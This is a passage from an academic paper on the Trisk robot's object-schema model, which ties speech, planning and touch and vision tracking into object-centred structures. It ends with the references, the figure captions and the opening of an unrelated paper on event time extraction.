category for colour or weight). Completion data contains information about whether a process completed successfully or not, as well as timing information about the process' execution. Completion data, as compiled over time, is incorporated into knowledge of the affordances of an object (such as liftability or graspability). Figure 5 shows the two types of history data deriving from interaction processes. Process classes Each interaction process in the system is an instance of a process class. Each process class defines the execution loop that its instances run. The execution loops for some of these classes exit at a defined point (e.g., finishing a grasping action) and the process reports completion data to its history. Other execution loops cycle forever, causing the process to write attribute data to its history until it is destroyed (e.g., its object schema is deleted). The following are the major types of process classes: Sensory processes are interaction processes that monitor incoming sensory data and write relevant data to their interaction histories. Subtypes in our implementation include collision detectors, visual trackers, and touch trackers. The visual trackers watch visual input and provide continuously updated visual information about an object. The touch trackers watch touch sensor input to determine if an object is being grasped. If the object is grasped, the touch trackers output the weight of the object and the location of the object based on the hand's location. Each sensory process is intended to loop forever. Action processes are interaction processes that, when activated by the planning system, send motor commands to the robot. Examples include a process to move the robot arm away from a collision, or to grasp the fingers around an object. An action process reports successful or failed completion when its attempt to perform its programmed actions is done. Plan fragment processes operate in the planning system to coordinate actions and preconditions. For instance, the plan fragment for grasping an object could require the precondition that the hand be open and positioned at the object's location. Then, it would trigger the action for closing the fingers. Plan fragment processes declare themselves complete when their attempt to perform their programmed sequence is done. These processes are often created in response to verbal commands. Condition processes continuously assess whether a specified condition is true or not, and when not true they trigger the planning system to search for plan fragment and action processes that can render them true. Condition processes loop endlessly until removed from their plan hierarchy, although for planning purposes they add a piece of completion data to their histories when their conditions are true. Translation processes convert interaction history data from other processes to a new form, such as a transformation from visual 2-D data to 3-D coordinates for targeting the arm, or a categorization from continuous colour data to a discrete colour category. These processes loop forever, and the results of their translations are written to their own interaction histories. The discrete categories (such as colour or shape labels) are used for connecting noun phrases to object schemas. Coordination processes maintain the integrity of object schemas by manipulating other interaction processes. Each object schema has a coordination process which monitors interactions between processes within that object schema. For instance, if visual and touch tracking disagree about an object's location, the coordination process can detach one of the processes from the object schema to resolve the conflict. These processes also loop forever, until destroyed along with their object schemas. Reference processes receive noun phrases from speech input and attempt to connect the noun phrases to object schemas with matching attributes. For instance, “the green block” leads to a reference process that reads interaction histories of each active object schema to find one that best fits “green” and “block.” These processes exit and report completion when a matching object schema is identified. Object schemas and the belief context Interaction processes can be incorporated into (bound to) structures called object schemas. Each object schema represents one physical object in the system's environment, and consists of a container that holds interaction processes that are considered to be “about” the represented object. Object schemas are stored in the belief context, which is a structure that stores object schemas along with accumulated affordance information. The belief context constitutes the set of beliefs that the system currently holds about its environment and its affordances. When an interaction process is bound to an object schema, history data for that process becomes associated with the object schema as well, and is treated as attribute or affordance information for the represented object. The object schemas act as discrete entities for planning and language use. Figure 6 depicts an object schema that consists of several interaction processes and, by association, their histories. Not all interaction processes are bound to object schemas. Processes that provide incoming sensory input (such as collision detection and visual segmentation) typically remain unbound. Object expectations When an interaction process is part of an object schema, its interaction history can be used to generate expectations of future history data. Expectation data is stored with the interaction process, alongside the history data that is being predicted. There are two types of expectation data: expected attributes, which predict attribute data, and expected affordances, which predict completion data. Expectations are used by the planning system to select a course of action. These expectations of future interactions would not be as straightforward to compute without the use of an object-centred framework, as mentioned in “Object representation,” above. The visual notation for expectations is given in Figure 7. Completion statistics In addition to object schemas, the belief context also stores statistics on completed action and plan fragment processes. These statistics are indexed by the attribute data of the object schema that the processes were bound to. As an example, if a lift action towards a heavy red apple failed, then the belief context would note the failure of lifting with respect to the attributes for “heavy,” “red,” and “apple.” Over time, trends emerge in these statistics; the “heavy” attribute might be a good predictor of difficulty lifting an object. These statistics are used to compute expected affordances, which in turn are used by the planning system to make decisions based on success likelihood. This learning of affordances for objects and attributes is the main type of learning present in our current system, although perceptual categories such as shapes and colours are also learned in a supervised manner in the current system. The association of success statistics with discrete object attributes such as “heavy” has an interesting ramification. At first glance, discrete attributes such as colour and weight labels (“red” or “heavy”) seem relevant to language use but have no efficacy in the robot's planning and actions. Linking attributes to success statistics allows the attributes to predict affordances, thus linking the attributes to the physical capabilities of the robot. Discrete object attributes then mean something in terms of the embodiment of the system, rather than only as a means of jointly referencing objects. This relates to the reason an embodied agent would represent discrete attributes in the first place -- awareness of discrete categories such as “heavy” helps to categorize objects based on their physical affordances. Plan hierarchies and the planning system The planning system stores and manipulates plan hierarchies. Like object schemas, plan hierarchies are structures composed of interaction processes. Each hierarchy is a tree structure that organizes action, condition, and plan fragment processes into a coherent sequence to address a primary motivation at the root of the tree. The root of each plan hierarchy is a primary motivation, which represents a basic “need” that the system attempts to satisfy by attaching appropriate interaction processes to the hierarchy. The primary motivations have priority scores that vary over time, reflecting the changing priority for each basic need. The priority scores are passed along the hierarchy from parents to children. The non-root nodes are interaction processes that the planning system attempts to run to completion. For each node X, X's children are the interaction processes which must complete before X can. For instance, a node responsible for closing the hand around an object will have a child node that ensures that the robot's hand is at the object's position before attempting to perform the grasp. A part of such a hierarchy is shown in Figure 8. Plan hierarchies are built such that their leaf nodes form a sequence of action processes that will serve the primary motivation. Across all the plan hierarchies, only the action process with the highest priority score is permitted to run at a given time. Thus, the primary motivations compete according to their current priority score to build hierarchies and have the robot take actions in their service. The construction of a plan hierarchy proceeds as follows: 1. For the primary motivation with the highest priority score, the planning system examines a list of action and plan fragment processes that are known to satisfy the primary motivation. When multiple processes are available, the expectations computed in the belief context are consulted to determine which is most likely to succeed. The best action or plan fragment process is then attached as a child node, and the priority score is propagated to it. 2. When a plan fragment process is the highest priority leaf node, the first element in its sequence (either an action or a condition process) is created and attached as a child. The priority score is passed to the child, which eventually leads to the satisfaction of preconditions and the execution of actions. When a child completes, it is detached by the planning system and the next element in the plan fragment's sequence is created and processed. 3. When a condition process is the highest-priority leaf node, the planning system conducts a search and attaches a child in the same way as for a primary motivation. 4. Action processes are always leaf nodes. Action processes compete to execute based on the priority scores propagated from the primary motivations. When an executing action process is complete it is detached from its parent so the hierarchy's sequence can continue. By choosing appropriate plan fragments to coordinate actions and conditions, the planning system executes a coherent sequence of actions that satisfies the strongest current motivation of the system. The planning system interacts with the belief context by using object schemas as targets for action and also as sources of likelihood data to decide between possible actions. Because each process in a plan hierarchy is also part of an object schema, changes recorded in interaction histories can rapidly affect likelihood data and cause revision of the plan hierarchy. Language interaction Incoming speech is provided to the model in the form of a parse tree. The tokens in the parse tree can then be connected to representations in the model. This primarily involves adding structures to the planning system in response to verb phrases, and connecting a noun phrase to an object schema that it refers to. When a verb phrase is received (in a command, for instance), it is assigned an appropriate structure in the planning system, such as a condition process that reports satisfaction when the command is executed. By attaching the structure to a primary motivation and setting the priority score, the planning system then takes responsibility for carrying out the relevant actions. Object-directed interaction processes are typically part of the object schema of their targeted object. However, an object-directed process based on speech input has no initial target, because speech input can only provide a noun phrase that describes the target object; it cannot identify a specific object schema without further processing. Because the object-directed processes cannot join an object schema until the system identifies the appropriate object schema, they are connected to a reference process until the correct object schema is found. Reference processes are the interaction processes responsible for connecting object schemas to noun phrases. They search the object schemas in the current belief context for one with discrete attributes (which are automatically produced by translation processes) that correspond to the tokens in the noun phrase. For each noun phrase, a reference process is created and provided with the tokens from the phrase. The process then searches the current object schemas for one with the appropriate discrete attributes. When a match is found, all object-directed interaction processes that are connected to the reference process are added to the matching object schema. Speech-driven action and plan fragment processes in plan hierarchies cannot be activated until their reference processes are resolved and they have been added to object schemas. Summary In the model, interaction processes handle sensory input, motor output, and internal recordkeeping. These interaction processes are organized into object schemas, each representing one physical object, and plan hierarchies, each representing one coherent sequence of actions. Language is processed by connecting noun phrases to object schemas and verb phrases to structures in the plan hierarchies. This approach presents several benefits relative to the other approaches mentioned in the Background section. Our model extends behaviour-based systems by explicitly representing objects, and it extends language-grounding systems by maintaining responsiveness to the environment. Furthermore, by building object schemas from reactive processes, our model gains several features over an SMPA language system added to a reactive robot: Computational scalability Instead of performing a full round of processing on current sensory inputs, our object schema model permits each bit of sensory input to affect only specific aspects of planning and language use. For example, a collision with an object can trigger a cascade of processing that directly changes the target position for subsequent grasping actions, while an SMPA approach would wait for the next modelling cycle to process all sensory input. By decoupling the processing of sensory inputs from each other, our approach decreases the latency time from sensory input to motor action, and renders our approach more amenable to parallelization across multiple processors or computers. Decisions can be made and altered in our model based on the interaction of a small subset of processes, rather than waiting for a complete model to be generated from new sensory input. As grounded language systems increase in complexity from the current set of relatively limited domains, our approach offers a path for scalability. Common currency Our model, by collecting all processes directed towards an object into the object schema, provides a convenient means of interaction between language, planning, and sensory processes. For example, hearing “the apple is heavy” enables our system to alter its plans based on this information. The system would also have arrived at the same decision if it had prior physical experience with the apple, or with objects with visual similarity to the apple. Likewise, if it has to lift the apple anyway, it can decide for itself how heavy the apple is, regardless of what it had been told. This convergence of multiple modalities, including language, would be more complicated to implement in an SMPA model. Multimodal affordances Finally, our object schemas provide a convenient way to represent affordances, such as liftability and graspability, for grounding affordance-related words. This coordination of information from multiple sources in an object-centric fashion would also be difficult in a model where planning and action are represented separately from the objects themselves. Implementation walkthrough The model has been implemented on a robot platform, named Trisk. In this section we describe the physical and sensorimotor systems of the robot, and then we discuss key aspects of the implemented model as it produces a sequence of behaviours. The robot and the sensorimotor systems Our robot platform, named Trisk (Figure 1 shows the robot in action), is a six degree of freedom (DOF) robotic arm with a four-DOF Barrett Hand as its end effector, situated in front of a table on which manipulable objects are placed. Six-axis force-torque sensors on each of the three fingers of the hand enable sensing of forces and collisions, including awareness of successful grasps. The downwards force of an object on the finger sensors provide the weight of the object. Two cameras (only one is currently active for simplicity) sit in a head mounted on a four-DOF neck, which allows the system to adjust its view of the environment and look up at the human for interactivity purposes. Visual input from the active camera is sent through a colour-based segmentation algorithm (based on CMVision [9]) that groups contiguous regions by colour. The current set of objects used for robot interactions consists of simple objects of uniform colour, so colour segmentation suffices for our purposes. Visual input is also processed on demand by a mean-shift tracker [15] based on edge and colour profile, and a 2-D shape recognition algorithm based on shape contexts [4] when requested by vision-related interaction processes. Visual information thus derived includes the size, shape, colour, and location of each object, and is discretized by translation processes for matching with incoming description words (such as “red” and “ball”). Visual locations are transformed into arm-space coordinates for grasping by assuming that objects are on the plane of the table and performing the appropriate vector math. The motor control modules for the robot's arm and hand compute forward and inverse kinematics, so the hand can be brought via a smooth trajectory towards reachable 3-D coordinates. The fingers can be spread to enable grasping, or moved together to tap an object. Touch input from the fingers is used along with arm kinematic information to provide the location, direction, and magnitude of contact forces between the fingers and physical objects. Collisions are detected by monitoring forces on the fingertip sensors, torques on the arm motors, and computing positions relative to hard-coded nearby surfaces. It should be noted that the robot's hand and arm significantly occludes the camera view of the workspace. The kinematics of the arm and hand are used to create what we call an “occlusion zone” in the visual input. In this area of visual input, apparent visual objects are considered untrustworthy and thus not instantiated by the model. Speech input is collected by a microphone headset worn by the human, and passed through the Sphinx 4 free speech recognizer and a probabilistic Earley parser (from [22]). The resulting parse trees provide structured tokens to be connected to object schemas and plan hierarchies. An example behaviour sequence In this section we narrate a sequence of behaviours (most of which is pictured in Figure 1) and discuss how the implementation produces this sequence. The sequence consists of the following behaviours: 1. The robot is looking at a table with a blue cup and a yellow ball on it. A green block and a red apple are then placed on the table. The system tracks the objects visually, maintaining the object representations throughout new visual frames. 2. The human says “Group the green block and the red apple.” The robot reaches towards the red apple in order to move it towards the green block. 3. The human interrupts the robot's action, saying “The red apple is heavy.” The robot reaches for the green block instead. 4. The robot misses the green block, and its wrist collides with the block. The robot immediately pulls away from the block, avoiding damage. Assuming it collided with the block, the system revises its location estimate for the block. 5. The robot adjusts its targeting, lifts the block, and moves it next to the red apple. Behaviour 1 The scenario begins with the robot's head facing the table with the blue cup and yellow ball. At this point, two object schemas already exist within the system, one representing the cup and the other representing the ball. Both of these object schemas have been created in response to the visual input. Visual tracking The green block is then placed on the table. Figure 9 depicts the processing of the subsequent frame of visual input. This processing requires extracting information about both previously- known objects, as well as starting to represent and track the green block. The three visual regions are detected by the unbound sensory process that handles visual segmentation, and written to its interaction history. Each of the pre-existing object schemas includes a visual tracking process for identifying regions in new visual frames that correspond to their objects. Past history data for each object schema leads to visual expectations for the object's current appearance. These expectations are compared to the regions in the new frame. The closest match for each object schema is found according to a distance metric and then “claimed” by the schema's visual tracker. New schema creation The third region written by the segmenter process goes unclaimed. As depicted in Figure 10, the unclaimed region triggers the creation of a new object schema. New object schemas start out with a coordination process, which is responsible for subsequently creating the other processes that will maintain the object schema's data and expectations. At the outset, a typical object schema consists of: • The coordination process that bootstraps the other necessary processes and removes processes when inconsistent data is detected. • Visual and touch tracking processes to assimilate incoming sensory data. • Translation processes to convert continuous sensory data (such as weight and colour) into discrete attribute categories (corresponding to word labels), and to convert between visual and touch coordinate systems. The visual tracker for each object provides information derived directly from the visual input frame, such as average colour, centroid location, and occupied pixel list. The translation processes then convert these into other attributes, such as colour category, shape, and location in physical space. The expected location in physical space is used for subsequent reaching and grasping actions. Action, condition, and plan fragment processes are later added to some object schemas due to planning and language activity. An action process will be bound to an object schema if the action is targeted towards the corresponding object (such as moving towards or lifting the object). A condition process will be bound to an object schema if the condition being tested involves an attribute of the object schema (such as the object being at a specific location). Likewise, a plan fragment process is bound to an object schema if actions and conditions within the plan fragment are targeted towards the object. In subsequent frames, the green block is tracked by its new object schema. The red apple is then handled similarly. Behaviour 2 The human says “Group the green block and the red apple.” Speech recognition and the language parser convert this verbal input into a parse tree. The parse tree triggers the creation of a plan hierarchy to coordinate the requested actions. The noun phrases in the parse tree must be connected to object schemas. In order to narrate these mechanisms, we frame the discussion by first describing the full range of verbal inputs and motivations of our implementation. Types of speech input We divide our speech inputs into four types: Queries Requests for information that require a verbal response, such as “Is the green block near the red apple?” and “Describe the block.” Directives Requests for the robot to perform motor action, such as “Touch the red apple” and “Move the block to the right.” Assertives Statements about the state of an object, such as “The red apple is heavy.” Correctives Partial directives which cause replacement in the immediately preceding full directive, such as “Pick up the red ball... no, the green ball.” Correctives are handled in a preprocessing step, by making the substitution into the preceding directive. In this example, the speech input is a directive, and leads to a plan hierarchy that attempts to execute a sequence of actions. Primary motivations The implementation makes use of three primary motivations: Safety The system makes plans to avoid taking damage. In the current implementation this entails avoiding and moving away from physical collisions. Social The system attempts to interact with the human partner by answering queries and carrying out requested actions. Curiosity The system explores objects by attempting to grasp and lift them. In doing so, the system learns about object affordances by automatically compiling statistics about completed action processes. Speech inputs that request action are processed by attaching a plan fragment process to the social motivation. For a directive, the verb is used to determine the sequence of actions that constitutes the plan fragment. The social motivation is then given a sufficient priority score to cause the planning system to carry out the given task. Reference processes Once the plan fragment process inherits the priority score, the planning system will attempt to expand its plan hierarchy. However, processes in a plan hierarchy cannot be handled by the planning system until it is clear which object schemas they are directed towards. The parse tree for the directive contains two noun phrases, “the green block” and “the red apple.” A reference process is generated for each noun phrase and assigned to an expression based on the parse tree. As an example, the reference process for “the red apple” is assigned the following expression: (refexpr (= function (lambda (x) (p_and (red x) (apple x)))) (= definite "definite") (= cardinality "1")))) The reference process runs a search function that matches object schemas based on category attributes provided by translation processes that were trained in a supervised fashion. When an object schema with matching attributes is identified, the processes connected to the reference process (in this case, the plan fragment process for “group”) are then bound to the object schema so planning can continue. Plan hierarchy construction Once an object schema is found for each of the two noun phrases, the planning system can continue by expanding the first sequence element of the “group” plan fragment. The sequence consists of a single condition, which tests whether the locations associated with the two schemas are near each other. This “grouped” condition process is created and attached as the child of the plan fragment. It then inherits the priority, and the planning system attempts to satisfy this condition. The expected results of each plan fragment is programmed with the plan fragment, so the planning system can search the list of expected results to find suitable plan fragments. The planning system can select one of two “move object” plan fragments, one that moves one object and one that moves the other. Expected affordances In order to select between two possible plan fragment processes, the planning system creates both within their respective object schemas. Once this is done, the belief context automatically assesses the expected affordances. This involves examining the history data of the object (i.e., how many times the object itself has been successfully moved) and the attribute-linked completion statistics (i.e., for the red apple, how often red objects are moved successfully, and how often apples are moved successfully). Based on these statistics, a success likelihood is generated for each of the prospective plan fragment processes. The planning system will read these likelihoods and then select the plan fragment with the best chance of success. Figure 11 depicts the plan hierarchy as it considers the choice. Figure 12 shows the structure of this hypothetical hierarchy after it has been fully built and executed. Behaviour 3 The robot has moved its open hand towards the apple in order to move it. At this point, the human says “The red apple is heavy.” The robot changes its mind and reaches for the green block instead. This behaviour is accomplished by processing the assertive input, updating expected affordances, and revising the plan. Assertive input and expected attributes “The red apple is heavy” is a speech input that asserts a belief about an object. First, a reference process identifies the red apple's object schema. Then, the label “heavy” is written as an expected attribute for the history data of the weight-categorizing translation process. Affordance monitoring and plan revisions As soon as the expectation of “heavy” is added to the apple's object schema, the belief context re-evaluates the expected affordance of whether the apple can be moved by the robot. Objects with the “heavy” attribute often cause lifting and moving processes to fail, and so the belief context records that any plan fragment processes attempting to lift and move the apple are likely to fail. This in turn causes the active “move object” plan fragment to expect failure, leading to a revision of the plan hierarchy. The system opts to move the block instead, and the robot proceeds to do so. Behaviour 4 As the robot hand approaches the block, its wrist collides with the block rather than encircling the block with the fingers. It immediately pulls away from the block Collision handling and claiming unbound data Upon detecting the collision, the collision detection process writes information about the collision to its history. This is noticed by the primary motivation for safety, which immediately increases its priority score to the maximum possible. The action process for moving away from a collision runs immediately, and pulls the arm away. The safety motivation's priority score then drops back to zero. The collision location provided by the collision detection process is also monitored by the touch trackers of all object schemas. Based on distance from an object's location estimate, each touch tracker can claim the new collision location as information about its object, writing the collision location to its interaction history. This is analogous to the claiming and writing of visual segment data by the visual trackers. In this example, the collision location is close to the block's expected location, and so the block's touch tracker revises its location estimate in physical space based on the collision. Behaviour 5 After the interruption by the safety motivation, the social motivation resumes control. The “move hand” action process was deactivated before it completed, and so the plan hierarchy restarts the action process, which makes use of the new location estimate provided by the green block's touch tracker. The hand arrives at the green block, closes around it, moves it next to the apple, and releases it. Multimodal tracking As the hand closes around the green block and begins to lift it, the touch tracker for the green block begins writing weight and location information to its interaction history. The touch tracker's location estimate is based on the location from the forward-kinematics for the hand. However, the visual tracker is continuing to provide visual locations based on the visual region associated with the block. Supposing that the visual tracker and touch tracker were to provide location estimates with substantial discrepancy, the coordination process for the object schema then has to step in and reconcile the information. It does this by removing the touch tracker from the object schema. The newly- unbound touch tracker will be used as the basis for a new object schema, just as unclaimed visual regions lead to new object schemas. By concurrently tracking objects in multiple modalities, the model potentially provides a foundation for coordinating expectations between modalities in greater detail. For example, physically rotating an object may alter its perceived visual shape. This is left for future work. The model could also benefit from the ability to merge and split object schemas, to handle cases where multimodal tracking discovers an error such as one perceived object turning out to be two, or vice-versa. Discussion The value of our model lies in its ability to retain a responsive coupling between its language use, planning, and sensorimotor modalities. Here, we review some of the behaviours that underlie this ability: 1. If the robot is reaching for an object and it misses slightly, colliding its wrist with the object, it will respond to the collision by moving away from the point of contact. The point of contact will immediately be claimed by the object schema of the targeted object, which revises its expected physical location, which causes the robot to adjust its grasping target accordingly. 2. If the robot is reaching to move a red ball, and it accidentally lifts a nearby green block instead, the visual trackers will observe that the red ball is not moving, and will put down the green block and retry the grasp. This is the result of a discrepancy at the object schema level between the grasp trackers and the visual trackers, which is resolved by the coordination process. 3. When the human says “Group the red apple and the green block... The red apple is heavy,” the new verbal information about the apple's weight is represented as an expectation in the same way as the equivalent physical interaction. This leads to a change in the expected affordances in the object schema, which leads to a re-evaluation of the planning system's hierarchy. The robot will reach for the green block instead. 4. Suppose the human says “Group the red apple and the green block,” without specifying any additional object information. If the robot then attempts to lift the red apple and repeatedly fails, this affects the expected affordances in the object schema in the same way, leading to the same re-evaluation. The data-sharing in our model that enables these sorts of responsive behaviours is made possible by the presence of interaction processes in both the object representations and the plan representations. In Example 1, the touch tracker notices the touch contact near the expected location of its object schema, and claims the point of contact as another piece of expectation information. In Example 2, the two trackers and the coordination process form a short information path between the touch and vision modalities, enabling a local correction. In Example 3, new verbal information adjusts an expected affordance, so the belief context alters the success likelihood for the “move object” plan fragment. This plan fragment process is also present in the plan hierarchy, enabling immediate re-evaluation by the planning system. Example 4 shows the same mechanism with direct physical interaction. Conclusion We have developed and implemented a model of object schemas that brings together responsive interactive robotics with natural language understanding. By building object schemas and plan hierarchies from the processes that govern responsive interaction, planning and language use are capable of leveraging information from the reactive processes directly and immediately. This stands in contrast to previous hybrid approaches that graft behaviour-based reactive control layers to SMPA-based architectures. Although there are many limitations to the model, the most critical one in our view is that currently all schema structures are manually constructed by human designers. As a result, we have had to take great care in creating physical environments that are consistent with the hand-coded structures of our robot. In the future we plan to turn this situation around by enabling robots to construct object schemas -- and higher order relational schemas as well -- that are consistent with whatever environment they find themselves in. Acknowledgments This paper is partly based upon work supported under a National Science Foundation Graduate Research Fellowship. We thank Bruce Blumberg and Rod Brooks for discussions that helped shape the work presented here. We also thank Jonathan Huggins, Thananat Jitapunkul, Peter Lai, John McBean, Kailas Narendran, Philipp Robbel, Kleovoulos Tsourides, David Wang, and Jonathan Wang, for their time and effort with numerous aspects of the robot system implementation. References [1] M.A.Arbib, T. Iberall, and D. Lyons. Schemas that integrate vision and touch for hand control. In Vision, Brain, and Cooperative Computation, M.A. Arbib and A.R. Hanson, eds., MIT Press, 1987, pp. 489– 510. [2] C. Bauckhage, J. Fritsch, K. Rohlfing, S. Wachsmuth, and G. Sagerer. Evaluating integrated speech and image understanding. In Proceedings of the IEEE International Conference on Multimodal Interfaces (ICMI), 2002, pp. 9–14. [3] P. Beeson, M. MacMahon, J. Modayil, A. Murarka, B. Kuipers, and B. Stankiewicz. Integrating multiple representations of spatial knowledge for mapping, navigation, and communication. In Proceedings of the AAAI 2007 Spring Symposium on Control Mechanisms for Spatial Knowledge Processing in Cognitive / Intelligent Systems, 2007. [4] S. Belongie, J. Malik, and J. Puzicha. Shape matching and object recognition using shape contexts. IEEE Transactions on Pattern Analysis and Machine Intelligence, 24(24), 2002, pp. 509–522. [5] M. Berlin, J. Gray, A.L. Thomaz, and C. Breazeal. Perspective taking: An organizing principle for learning in human-robot interaction. In Proceedings of the Twenty-First National Conference on Artificial Intelligence (AAAI), 2006. [6] C. Breazeal, M. Berlin, A. Brooks, J. Gray, and A.L. Thomaz. Using perspective taking to learn from ambiguous demonstrations. Journal of Robotics and Autonomous Systems, Special Issue on Robot Programming by Demonstration, 54(5), 2006. [7] R.A. Brooks. A robust layered control system for a mobile robot. IEEE Journal of Robotics and Automation, 2, 1986, pp.14–23. [8] R.A. Brooks. Intelligence without representation. Artificial Intelligence, 47, 1991, pp.139–160. [9] J. Bruce, T. Balch, and M. Veloso. Fast and inexpensive colour image segmentation for interactive robots. In Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS), 2000. [10] J. J. Bryson. Intelligence by Design: Principles of Modularity and Coordination for Engineering Complex Adaptive Agents. PhD thesis, Massachusetts Institute of Technology, 2001. [11] J. J. Bryson and L. A. Stein. Modularity and design in reactive intelligence. In Proceedings of the International Joint Conference on Artificial Intelligence, 2001, pp. 1115–1120. [12] R. Burke, D. Isla, M. Downie, Y. Ivanov, and B. Blumberg. Creature smarts: The art and architecture of a virtual brain. In Proceedings of the Game Developers Conference, 2001, pp. 147–166. [13] A. Cangelosi. The grounding and sharing of symbols. Pragmatics and Cognition, 14, 2006, pp. 275–285. [14] A. Clark and J. Toribio. Doing with representing. Synthese, 101, 1994, pp. 401–431. [15] D. Comaniciu and P. Meer. Mean shift: A robust approach toward feature space analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence, 24(5), 2002. [16] G. Drescher. Made-Up Minds: A Constructivist Approach to Artificial Intelligence. MIT Press, 1991. [17] P. Fitzpatrick. From First Contact to Close Encounters: A Developmentally Deep Perceptual System for a Humanoid Robot. PhD thesis, Massachusetts Institute of Technology, 2003. [18] P. Fitzpatrick and G. Metta. Grounding vision through experimental manipulation. Philosophical Transactions of the Royal Society: Mathematical, Physical, and Engineering Sciences, 361(1811), 2003, pp. 2165–2185. [19] E. Gat. Integrating planning and reaction in a heterogeneous asynchronous architecture for controlling mobile robots. In Proceedings of the Tenth National Conference on Artificial Intelligence (AAAI), 1992. [20] E. Gat. Three-layer architectures. In Artificial Intelligence and Mobile Robots, D. Krotenkamp, R.P. Bannasso, and R. Murphy, eds., AAAI Press, 1998. [21] J. J. Gibson. The Ecological Approach to Visual Perception. Erlbaum, 1979. [22] P. Gorniak and D. Roy. Situated language understanding as filtering perceived affordances. Cognitive Science, 31(2), 2007, pp.197–231. [23] K. Hsiao and D. Roy. A habit system for an interactive robot. In AAAI Fall Symposium: From Reactive to Anticipatory Cognitive Embodied Systems, 2005. [24] D. Isla, R. Burke, M. Downie, and B. Blumberg. A layered brain architecture for synthetic creatures. In Proceedings of International Joint Conferences on Artificial Intelligence, 2001. [25] L.S. Lopes and J.H. Connell. Semisentient robots: Routes to integrated intelligence. IEEE Intelligent Systems, 16, 2001, pp. 10–14. [26] L.S. Lopes and A. Teixeira. Human-robot interaction through spoken language dialogue. In Proceedings of the 2000 IEEE/RSJ International Conference on Intelligent Robots and Systems, 2000. [27] J. Modayil and B. Kuipers. Where do actions come from? Autonomous robot learning of objects and actions. In Proceedings of the AAAI 2007 Spring Symposium on Control Mechanisms for Spatial Knowledge Processing in Cognitive / Intelligent Systems, 2007. [28] N. J. Nilsson. Shakey the robot. Technical Report 323, AI Center, SRI International, 1984. [29] J. Piaget. The Construction of Reality in the Child. Basic Books, 1955. [30] T. Regier and L. Carlson. Grounding spatial language in perception: An empirical and computational investigation. Journal of Experimental Psychology, 130(2), 2001, pp. 273–298. [31] D. Roy. Grounding words in perception and action: Computational insights. Trends in Cognitive Science, 9(8), 2005, pp. 389–396. [32] D. Roy. Semiotic schemas: A framework for grounding language in action and perception. Artificial Intelligence, 167(1-2), 2005, pp.170–205. [33] D. Roy. A mechanistic model of three facets of meaning. In Symbols and Embodiment, M.D. Vega, G. Glennberg, and G. Graesser, eds., Oxford University Press, 2008. [34] D. Roy, K. Hsiao, and N. Mavridis. Mental imagery for a conversational robot. IEEE Transactions on Systems, Man, and Cybernetics, 34, 2004, pp. 1374–1383. [35] D. Roy and E. Reiter. Connecting language to the world. Artificial Intelligence, 167(1-2), 2005, pp. 1– 12. [36] J.M. Siskind. Grounding the lexical semantics of verbs in visual perception using force dynamics and event logic. Journal of Artificial Intelligence Research, 15, 2001, pp. 31–90. [37] M. Skubic, D. Perzanowski, S. Blisard, A. Schultz, W. Adams, M. Bugajska, and D. Brock. Spatial language for human-robot dialogs. IEEE Transactions on SMC Part C, Special Issue on Human- Robot Interaction, 34(2), 2004, pp. 154–167. [38] L. Steels and T. Belpaeme. Coordinating perceptually grounded categories through language: A case study for colour. Behavioural and Brain Sciences, 28, 2005, pp. 469–529. [39] A. Stoytchev. Behaviour-grounded representation of tool affordances. In Proceedings of IEEE International Conference on Robotics and Automation (ICRA), 2005. [40] P. Vogt and F. Divina. Social symbol grounding and language evolution. Interaction Studies, 8(1), 2007, pp. 31–52. [41] T. Winograd. Understanding Natural Language. Academic Press, 1972. Figure 1. The robot, Trisk, is facing a scene that includes a red apple and a green block. a) Trisk is told, “Group the green block and the red apple.” This request could be satisfied by moving the block towards the apple, or vice versa. The robot decides to move the apple. b) While the robot reaches for the apple, the human adds, “The red apple is heavy.” Knowing that heavy objects are more difficult to lift, the robot changes its plan and c) moves the green block d) towards the apple instead. This example demonstrates the responsiveness of the system to new information. Figure 2. An SMPA hybrid model connects language use to a model of the physical world. Responsive behaviours can be run at a higher priority independently of the SMPA modules, enabling responsiveness but remaining separate from the main system. Figure 3. In our model, responsive processes (small ellipses, with small arrows depicting information passed in and out) are organized into object schemas (large boxes). The processes handle the various functions needed to maintain the object schema and connect to language. Figure 4. Visual notation for four example interaction processes with various run states and finish states. Figure 5. Visual notation for interaction history data generated by interaction processes. For simplicity, not all history data will be shown for processes depicted in such diagrams. Figure 6. An object schema, containing three interaction processes relevant to its represented object. The reference process is depicted on the edge of the object schema to denote that it controls the object schema by including or removing other processes from the schema. For simplicity, not all processes in an object schema will be shown in these diagrams. Figure 7. Top: The visual location associated with this example object schema leads to (denoted by the small arrow) an expectation that the corresponding grasp action will complete successfully. Bottom: The grasp action is completed and reports a failure. Figure 8. An example plan hierarchy, showing the primary “social” motivation connected to a tree of interaction processes. The arrows denote a parent-child relation, and indicate that the parent cannot be completed until the child completes. The tree consists of action processes, condition processes, and plan fragment processes. Figure 9. Top: The visual segmenter produces a list of coloured regions from a frame of visual input. Middle: Based on their histories, the visual trackers of two object schemas have expected attributes for how their visual regions will appear in the new frame. Bottom: The visual trackers have claimed the regions from the visual segmenter's interaction history, and copied the new visual data to their own histories. Figure 10. Top: The unclaimed visual segment from Figure 9 triggers the creation of a new object schema in the belief context. Bottom: The new schema's coordination process immediately creates trackers and translators which populate the history data for the object schema. Figure 11. The planning system must choose between two plan fragments, both of which might satisfy the “grouped” condition process. Figure 12. A completed plan hierarchy for grouping the green block (object 9) and the red apple (object 10). Action processes are typically deleted when they complete, but they are depicted here to show the entire structure. Temporal sequences for children of plan fragments are shown left-to-right. Abstract Object-centred, behaviour-based language grounding Background SMPA and non-linguistic behaviour-based robots Object representation Reactive grounded language robots Other grounded language systems Interaction processes and the object schema model Interaction processes and histories Object schemas and the belief context Plan hierarchies and the planning system Language interaction Summary Implementation walkthrough The robot and the sensorimotor systems An example behaviour sequence Behaviour 1 Behaviour 2 Behaviour 3 Behaviour 4 Behaviour 5 Discussion Conclusion Acknowledgments References work_lt7hy66js5extgi7lfl3faat4a ---- Event Time Extraction with a Decision Tree of Neural Classifiers Nils Reimers†, Nazanin Dehghani‡∗, Iryna Gurevych† † Ubiquitous Knowledge Processing Lab (UKP) and Research Training Group AIPHES Department of Computer Science, Technische Universität Darmstadt ‡ School of Electrical and Computer Engineering, University of Tehran www.ukp.tu-darmstadt.de Abstract Extracting the information from text when an event happened is challenging. Documents do not only report on current events, but also on past events as well as on future events. Often, the relevant time information for an event is scattered across the document. In this paper we present a novel method to auto- matically anchor events in time. To our knowl- edge it is the first approach that takes tempo- ral information from the complete document into account. We created a 